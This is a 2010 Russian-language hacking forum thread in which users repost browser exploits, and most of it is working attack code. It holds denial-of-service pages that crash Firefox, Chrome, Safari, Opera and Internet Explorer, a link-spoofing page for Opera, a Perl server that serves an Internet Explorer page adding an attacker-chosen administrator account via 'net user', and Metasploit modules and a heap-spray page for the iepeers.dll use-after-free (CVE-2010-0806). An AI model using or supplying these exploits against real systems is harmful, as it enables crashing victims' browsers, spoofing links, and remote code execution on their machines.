Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
23.03.2010, 23:43
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Уязвимости браузеров
Firefox 3.5 unicode stack overflow. Andrew Haynes , Simon Berry-Byrne
Код:
<html>
<head>
<script language="JavaScript" type="Text/Javascript">
var str = unescape("%u4141䅁");
var str2 = unescape("");
var finalstr2 = mul8(str2, 49000000);
var finalstr = mul8(str, 21000000);
document.write(finalstr2);
document.write(finalstr);
function mul8 (str, num) {
var i = Math.ceil(Math.log(num) / Math.LN2),
res = str;
do {
res += res;
} while (0 < --i);
return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>
# milw0rm.com [2009-07-15]
Добавлено через 12 минут
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
Код:
# EDB-ID: 11432
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Asheesh kumar Mani Tripathi
# Published: 2010-02-13
# Verified: yes
# Download Exploit Code
# Download N/A
view source
print?
=======================================================================
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company aksitservices
# Credit by Asheesh Anaconda
#Download www.mozilla.com/firefox
#Background
Mozilla Firefox is a popular internet browser. .....:)
#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists when the attacker put window.printer() funtion
in multitudinous loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.
#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
========================================================================================================================
asheesh.html
========================================================================================================================
<html>
<title>asheesh kumar mani tripathi</title>
<script>
function
asheesh()
{
window.onerror=new Function("history.go(0)");
window.print();
asheesh();
}
asheesh();
</script>
</html>
========================================================================================================================
#If you have any questions, comments, or concerns, feel free to contact me.
Добавлено через 42 минуты
Mozilla Firefox <= 3.6 Denial Of Service Exploit
Код:
# EDB-ID: 11590
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Ale46
# Published: 2010-02-27
# Verified: yes
# Download Exploit Code
# Download Vulnerable app
view source
print?
<?php
/*
* Title: Mozilla Firefox <=3.6 - Remote Denial Of Service Exploit
* Date: 25/02/10
* Author: Ale46 - ale46[at]paranoici[dot]org
* Software Link: http://www.mozilla-europe.org/en/firefox/
* Version: 3.6 and 3.5.8 are vulnerable so I think that all versions <= 3.6 have the same issue
* Tested on: Windows 7 x32\x64 - Ubuntu 9.10 x32
* Description: visiting this php page you'll get an instant crash of Firefox
* Greetz: Gandalf
* Extra Greetz: University of Palermo and its fantastics rules for the Computer Engineering degree (how beautiful 's irony)
*/
$a = '<marquee>';
$b = '</marquee>';
for ($i=0;$i<=1000;$i++){
$a .= '<marquee>';
$b .= '</marquee>';
}
echo '<body>';
echo $a;
echo "hadouken!";
echo $b;
echo '</body>';
?>
Opera 10.10 Status Bar Obfuscation
Код:
<center><h1>Opera 10.10 Status Bar Obfuscation</h1>
<br>
<strong>Author : 599eme Man.<br >
Contact : flouf@live.fr</strong><br >
_______________________________________________________________________
<br>
<br>
<br>
Click on google (look the Status bar) and you'll be redirect on Yahoo<br><strong><h1><a onclick="javascript:OB();" href="http://www.Google.com">http://www.Google.com</a></h1></strong></center>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<font style="font-family:arial;font-size:32px">Look Here<br>
| <br>
V
<script>
function OB() {
document.write('');
document.location='http://yahoo.com';
}
</script>
Последний раз редактировалось 547; 23.03.2010 в 23:51..
|
|
|
28.05.2010, 13:36
|
|
Новичок
Регистрация: 01.01.2009
Сообщений: 27
Провел на форуме:
125085
Репутация:
31
|
|
Cross Site URL Hijacking by using Error Object in Mozilla Firefox
XSUH атаки используется, чтобы украсть URL другого веб-сайта. Этот URL может показать статус клиента на этом сайте, и он может содержать конфиденциальную информацию, такую как идентификатор сессии и т.п.
Как вы знаете, сценарии обработки ошибок в Mozilla Firefox являются весьма полезными для разработчиков, они могут показать точный источник ошибки и другую полезную информацию. Теперь эта функция может быть использована для кражи URL после редиректа (XSUH атака), что может привести к утечке конфиденциальной информации.
Сама техника проведения атаки здесь [eng]
Примерчик
Было протестированно на Mozilla Firefox 3.6.3, 3.5.9, 3.6.4 build 5 ( 26.05.2010).
===================================
All browsers 0day Crash Exploit (2)
===================================
Код:
<html>
<head>
<meta http-equiv="Refresh" content="999999999999999999999999999999999999">
<title>Crasher</title></head>
<html>
<body bgcolor="black">
<center>
<font color="red">
<br>
<br>
<br>
<br>
<script language="javascript">
now=new Date();
document.write(now+"<br>");
h=now.getHours();
m=now.getMinutes();
s=now.getSeconds();
document.write("<font size='+5'>");
for (i =0;i<99999999999999999;i++) {
document.write('<html><marquee><h1>'+h+":"+m+":"+s);
}
alert('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
</script>
</center>
</font>
</body>
</html>
Последний раз редактировалось lzr; 28.05.2010 в 17:11..
|
|
|
|
29.05.2010, 14:27
|
|
Новичок
Регистрация: 01.01.2009
Сообщений: 27
Провел на форуме:
125085
Репутация:
31
|
|
================================================== ====================
Google Chrome 4.1.249.1064 Remote Memory Corrupt (Local Crash Exploit)
================================================== ====================
Save this script with extension .html or .htm
Then open with Google Chrome web browser
THIS FOR EDUCATIONAL PURPOSE ONLY
AUTHOR WILL NOT RESPONSIBLE FOR ANY DAMAGE
Webpage display issues: "Aw, Snap!"
Issue: You may see the "Aw, Snap!" message if a webpage crashes unexpectedly.
Tested on: WINXP (sp2 - sp3) - WIN 7
Affected: Google Chrome version 4.1.249.1064 and Prior
Author: eidelweiss
Contact: eidelweiss[at]cyberservices[dot]com OR g1xsystem[at]windowslive.com
Greets: [D]eal [c]yber and All Indonesian Hacker`s
Код:
Код:
<body onload="javascript:DoS();"></body>
<script>
function DoS() {
var buffer = '\x41';
for (i =0;i<666;i++) {
buffer+=buffer+'\x41';
document.write('<html><marquee><h1>'+buffer+buffer);
}
}
</script>
================================================== =
Google Chrome acronym tag denial of service exploit
================================================== =
Код:
Код:
<html>
<title>Google Chrome remote stack overflow in chrome.dll; published at http://h.ackack.net; found by: Jelmer de Hen</title>
<head>
<script>
// Open it a couple of times, it might not always work; see http://h.ackack.net/?p=323 for more information
function pataboom(){
while(1){
document.write("<acronym>");
}
}
</script>
</head>
<body onload="pataboom();"></body>
</html>
================================================== ============
Safari 4.0.5 and Internet Explorer 6.0 / 8.0 Denial of Service
================================================== ============
Код:
Код:
<?php
# Canvas tag DoS Mozilla firefox 3.6.3
# Canvas tag DoS Safari 4.0.5 (TESTED)
# Canvas tag DoS Google Chrome 4.1
# Canvas tag DoS Opera 10.52
# Canvas tag DoS Internet Explorer 6.0 & 8.0 (TESTED)
#
# Found by Jelmer de Hen
# published at http://h.ackack.net/?p=269
# OS: Windows XP SP3
# Mozilla Firefox 3.6.3
echo "<html><body>";
while (1){
echo "<canvas>";
}
echo "</body>";
echo "</html>";
?>
Multiple Browsers Audio Tag Denial of Service Vulnerability
Код:
Код:
#!/usr/bin/python
#Multiple Browsers Audio Tag Denial of Service Vulnerability
#any ogg file can be used for the DoS as long as it is a valid file on the server
#crash reporter for Mac seems to think this is a EXEC_BAD_ACCESS
#This script acts as a web server to DoS connecting clients
# Exploit Title: Multiple Browsers Audio Tag DoS Vulnerability
# Date: April 21th, 2010
# Author: Chase Higgins, http://twitter.com/tzDev
# Software Link: google.com/chrome, apple.com/safari
# Version: Google Chrome 5.0.375.9 dev
# Tested on: Mac OSX 10.5.8
import sys, socket;
def main():
html = """
<html>
<body>
""";
html += "<audio src='myogg.ogg'>" * 10000;
html += """
</body>
</html>
""";
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.bind(('', 2121));
s.listen(1);
while True:
channel, details = s.accept();
print channel.recv(256);
channel.send(html);
channel.close();
main();
|
|
|
|
30.05.2010, 19:39
|
|
Новичок
Регистрация: 01.01.2009
Сообщений: 27
Провел на форуме:
125085
Репутация:
31
|
|
Internet Explorer ( 6/7) Remote Code Execution -Remote User Add Exploit
Код:
#!/usr/bin/perl
use strict;
use Socket;
use IO::Socket;
print "\n";
print "800008 8 \n";
print "8 e eeeee eeeeeee eeeee 8 eeeee eeeee eeeee\n";
print "8eeeee 8 8 88 8 8 8 8 8 8e 8 8 8 8 8 | \n";
print " 88 8e 8 8 8e 8 8 8eee8 88 8eee8 8eee8e 8eeee \n";
print "e 88 88 8 8 88 8 8 88 8 88 88 8 88 8 88 \n";
print "8eee88 88 8eee8 88 8 8 88 8 88eee 88 8 88eee8 8ee88 \n";
print "-----------------------------------------------------------\n";
print " Useage : $0 Port \n";
print " Please Read the Instruction befor you use this \n";
print " ---------------------------------\n";
sub parse_form {
my $data = $_[0];
my %data;
foreach (split /&/, $data) {
my ($key, $val) = split /=/;
$val =~ s/\+/ /g;
$val =~ s/%(..)/chr(hex($1))/eg;
$data{$key} = $val;}
return %data; }
my $port = shift;
defined($port) or die "Usage: $0 Port \n";
mkdir("public_html", 0777) || print $!;
my $DOCUMENT_ROOT = $ENV{'HOME'} . "/public_html";
print " [+] Account Name : "; chomp(my $acc=<STDIN>);
print " [+] Account Password : "; chomp(my $pass=<STDIN>);
print " [+] Your IP : "; chomp (my $ip=<STDIN>);
#------------- Exploit -----------------
my $iexplt= "public_html/index.html";
open (myfile, ">>$iexplt");
print myfile "<html>\n";
print myfile "<title> IE User Add Test </title>\n";
print myfile "<head>";
print myfile "</font></b></p>\n";
print myfile "<p>\n";
print myfile "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='exploit'\n";
print myfile "></object>\n";
print myfile "<script language='vbscript'>\n";
print myfile "adduser=";
print myfile '"cmd';
print myfile " /c net user $acc $pass /add && net localgroup Administrators $acc ";
print myfile '/add"';
print myfile "\n";
print myfile "exploit.run adduser \n";
print myfile "\n </script></p>\n";
print " [+] ----------------------------------------\n";
print " [-] Link Genetrated : http://$ip:$port/index.html\n";
close (myfile);
#------------------------------------
my $server = new IO::Socket::INET(Proto => 'tcp',
LocalPort => $port,
Listen => SOMAXCONN,
Reuse => 1);
$server or die "Unable to create server socket: $!" ;
while (my $client = $server->accept()) {
$client->autoflush(1);
my %request = ();
my %data;
{
local $/ = Socket::CRLF;
while (<$client>) {
chomp;
if (/\s*(\w+)\s*([^\s]+)\s*HTTP\/(\d.\d)/) {
$request{METHOD} = uc $1;
$request{URL} = $2;
$request{HTTP_VERSION} = $3;
}
elsif (/:/) {
(my $type, my $val) = split /:/, $_, 2;
$type =~ s/^\s+//;
foreach ($type, $val) {
s/^\s+//;
s/\s+$//;
}
$request{lc $type} = $val;
}
elsif (/^$/) {
read($client, $request{CONTENT}, $request{'content-length'})
if defined $request{'content-length'};
last;
}
}
}
if ($request{METHOD} eq 'GET') {
if ($request{URL} =~ /(.*)\?(.*)/) {
$request{URL} = $1;
$request{CONTENT} = $2;
%data = parse_form($request{CONTENT});
} else {
%data = ();
}
$data{"_method"} = "GET";
} elsif ($request{METHOD} eq 'POST') {
%data = parse_form($request{CONTENT});
$data{"_method"} = "POST";
} else {
$data{"_method"} = "ERROR";
}
my $localfile = $DOCUMENT_ROOT.$request{URL};
if (open(FILE, "<$localfile")) {
print $client "HTTP/1.0 200 OK", Socket::CRLF;
print $client "Content-type: text/html", Socket::CRLF;
print $client Socket::CRLF;
my $buffer;
while (read(FILE, $buffer, 4096)) {
print $client $buffer;
}
$data{"_status"} = "200";
}
else {
print $client "HTTP/1.0 404 Not Found", Socket::CRLF;
print $client Socket::CRLF;
print $client "<html><body>404 Not Found</body></html>";
$data{"_status"} = "404";
}
close(FILE);
print ($DOCUMENT_ROOT.$request{URL},"\n");
foreach (keys(%data)) {
print (" $_ = $data{$_}\n"); }
close $client;
# Sioma Labs
# http://siomalabs.com
# Sioma Agent 154
}
0-day експлойт для Internet Explorer
описание : http://garwarner.blogspot.com/2010/0...f-band-ie.html
експлоиты :
1
Код:
##
2 # $Id: ie_iepeers_pointer.rb 8779 2010-03-11 05:49:14Z hdm $
3 ##
4
5 ##
6 # This file is part of the Metasploit Framework and may be subject to
7 # redistribution and commercial restrictions. Please see the Metasploit
8 # Framework web site for more information on licensing and terms of use.
9 # http://metasploit.com/framework/
10 ##
11
12 ##
13 # ie_iepeers_pointer.rb
14 #
15 # Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
16 #
17 # Tested successfully on the following platforms:
18 # - Microsoft Internet Explorer 7, Windows Vista SP2
19 # - Microsoft Internet Explorer 7, Windows XP SP3
20 # - Microsoft Internet Explorer 6, Windows XP SP3
21 #
22 # Exploit found in-the-wild. For additional details:
23 # http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
24 #
25 # Trancer
26 # http://www.rec-sec.com
27 ##
28
29 require 'msf/core'
30
31 class Metasploit3 < Msf::Exploit::Remote
32 Rank = GoodRanking
33
34 include Msf::Exploit::Remote::HttpServer::HTML
35
36 def initialize(info = {})
37 super(update_info(info,
38 'Name' => 'Internet Explorer iepeers.dll Use After Free',
39 'Description' => %q{
40 This module exploits a use-after-free vulnerability within iepeers.dll of
41 Microsoft Internet Explorer versions 6 and 7.
42
43 NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
44 },
45 'License' => MSF_LICENSE,
46 'Author' =>
47 [
48 'unknown', # original discovery
49 'Trancer <mtrancer[at]gmail.com>', # metasploit module
50 'jduck' # minor cleanups
51 ],
52 'Version' => '$Revision: 8779 $',
53 'References' =>
54 [
55 [ 'CVE', '2010-0806' ],
56 [ 'OSVDB', '62810' ],
57 [ 'BID', '38615' ],
58 [ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
59 [ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
60 ],
61 'DefaultOptions' =>
62 {
63 'EXITFUNC' => 'process',
64 'InitialAutoRunScript' => 'migrate -f',
65 },
66 'Payload' =>
67 {
68 'Space' => 1024,
69 'BadChars' => "\x00\x09\x0a\x0d'\\",
70 'StackAdjustment' => -3500,
71 },
72 'Platform' => 'win',
73 'Targets' =>
74 [
75 [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
76 ],
77 'DisclosureDate' => 'Mar 09 2010',
78 'DefaultTarget' => 0))
79 end
80
81 def on_request_uri(cli, request)
82
83 # Re-generate the payload
84 return if ((p = regenerate_payload(cli)) == nil)
85
86 # Encode the shellcode
87 shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
88
89 # Set the return\nops
90 ret = Rex::Text.to_unescape([target.ret].pack('V'))
91
92 # Randomize the javascript variable names
93 j_shellcode = rand_text_alpha(rand(100) + 1)
94 j_nops = rand_text_alpha(rand(100) + 1)
95 j_slackspace = rand_text_alpha(rand(100) + 1)
96 j_fillblock = rand_text_alpha(rand(100) + 1)
97 j_memory = rand_text_alpha(rand(100) + 1)
98 j_counter = rand_text_alpha(rand(30) + 2)
99 j_ret = rand_text_alpha(rand(100) + 1)
100 j_array = rand_text_alpha(rand(100) + 1)
101 j_function1 = rand_text_alpha(rand(100) + 1)
102 j_function2 = rand_text_alpha(rand(100) + 1)
103 j_object = rand_text_alpha(rand(100) + 1)
104 j_id = rand_text_alpha(rand(100) + 1)
105
106 # Build out the message
107 html = %Q|<html><body>
108 <button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
109 <script language='javascript'>
110 function #{j_function1}(){
111 var #{j_shellcode} = unescape('#{shellcode}');
112 #{j_memory} = new Array();
113 var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
114 var #{j_nops} = unescape('#{ret}');
115 while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
116 var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
117 delete #{j_nops};
118 for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
119 #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
120 }
121 }
122 function #{j_function2}(){
123 #{j_function1}();
124 var #{j_object} = document.createElement('body');
125 #{j_object}.addBehavior('#default#userData');
126 document.appendChild(#{j_object});
127 try {
128 for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
129 #{j_object}.setAttribute('s',window);
130 }
131 } catch(e){ }
132 window.status+='';
133 }
134
135 document.getElementById('#{j_id}').onclick();
136 </script></body></html>
137 |
138
139 print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
140
141 # Transmit the compressed response to the client
142 send_response(cli, html, { 'Content-Type' => 'text/html' })
143
144 # Handle the payload
145 handler(cli)
146
147 end
148
149 end
2
Код:
<html>
02 <body>
03 <button id="helloworld" onclick="blkjbdkjb();" STYLE="DISPLAY:NONE"></button>
04 <script language="JavaScript" src="bypasskav.txt">
05 </script>
06 <script language="JavaScript">
07 function eejeefe() {
08 var s=unescape("%u0c0c");
09 var u=unescape("%u0c0c");
10 var c=s+u;var array = new Array();
11 var ls = 0x86000-(c.length*2);
12 var b = unescape("%u0c0c%u0c0C");
13 while(b.length<ls/2){b+=b;
14 }
15 var lh = b.substring(0,ls/2);
16 delete b;for(i=0;i<270;i++) {
17 array[i] = lh + lh + c;
18 }
19 }
20 function blkjbdkjb() {
21 eejeefe();
22 var sdfsfsdf = document.createElement("BODY");
23 sdfsfsdf.addBehavior("#default#userData");
24 document.appendChild(sdfsfsdf);
25 try {
26 for (i=0;i<10;i++) {
27 sdfsfsdf.setAttribute('s',window);
28 }
29 }
30 catch(e) {}
31 window.status+='';
32 }
33 document.getElementById("helloworld").onclick();
34 </script>
35 </body>
36 </html>
3
Код:
# Title: Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)
# EDB-ID: 11683
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Trancer
# Published: 2010-03-10
# Verified: yes
# Download Exploit Code
# Download N/A
view source
print?
##
# ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/in...-free-exploit/
#
# Trancer
# http://www.rec-sec.com
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Internet Explorer iepeers.dll use-after-free',
'Description' => %q{
This module exploits a use-after-free vulnerability within iepeers.dll of
Microsoft Internet Explorer versions 6 and 7.
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
},
'License' => MSF_LICENSE,
'Author' => [
'Trancer <mtrancer[at]gmail.com>'
],
'Version' => '$Revision:$',
'References' =>
[
[ 'CVE', '2010-0806' ],
[ 'OSVDB', '62810' ],
[ 'BID', '38615' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'Mar 09 2010',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([target.ret].pack('V'))
# Randomize the javascript variable names
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_array = rand_text_alpha(rand(100) + 1)
j_function1 = rand_text_alpha(rand(100) + 1)
j_function2 = rand_text_alpha(rand(100) + 1)
j_object = rand_text_alpha(rand(100) + 1)
j_id = rand_text_alpha(rand(100) + 1)
# Build out the message
html = %Q|<html><body>
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
<script language='javascript'>
function #{j_function1}(){
var #{j_shellcode} = unescape('#{shellcode}');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape('#{ret}');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}(){
#{j_function1}();
var #{j_object} = document.createElement('body');
#{j_object}.addBehavior('#default#userData');
document.appendChild(#{j_object});
try {
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
#{j_object}.setAttribute('s',window);
}
} catch(e){ }
window.status+='';
}
document.getElementById('#{j_id}').onclick();
</script></body></html>|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
end
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
